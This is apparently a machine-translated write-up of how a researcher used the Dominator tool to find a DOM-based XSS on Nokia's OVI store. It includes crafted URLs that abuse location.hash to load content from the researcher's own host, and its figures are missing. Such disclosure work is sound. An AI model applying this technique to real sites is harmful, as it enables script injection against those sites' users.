How to Use Dominator to discover DOM-based XSS vulnerabilities on Nokia Official Website
Background
DOM-based XSS (Cross-Site Scripting) vulnerabilities are generally difficult to find. In this article, the author uses Dominator to discover and use dom xss on the Nokia (Nokia) OVI website, this reminds me of the Second Brother's artifact :)
Brief Introduction
Resources in the DIV are all specified through location. hash. The author ran it with Dominator and found the following results:
The following figure shows a controllable point: location. hash and the resource is loaded through XMLHR. open. open the address in chrome and the console output is as follows:
Reload the following URL:
Http://store.ovi.com/#/jasminder
Dominator displays the following information:
If the author wants to see if the resources of a third-party website can be loaded, he loads the location of location. hash on his website and initiates a request. The result is as follows:
The actual request is as follows. The request is not sent to the author's website.
Http://store.ovi.com/jasminderapalsingh.info? Fragment = 1
However, the author later found that if the following request is initiated in chrome:
Http://store.ovi.com/#/~jasminderapalsingh.info
The browser initiates the following request:
This method can be used to initiate a request to a third-party host and load the data of the third-party host. In this way, the author places payload on his website. The final implementation result is as follows: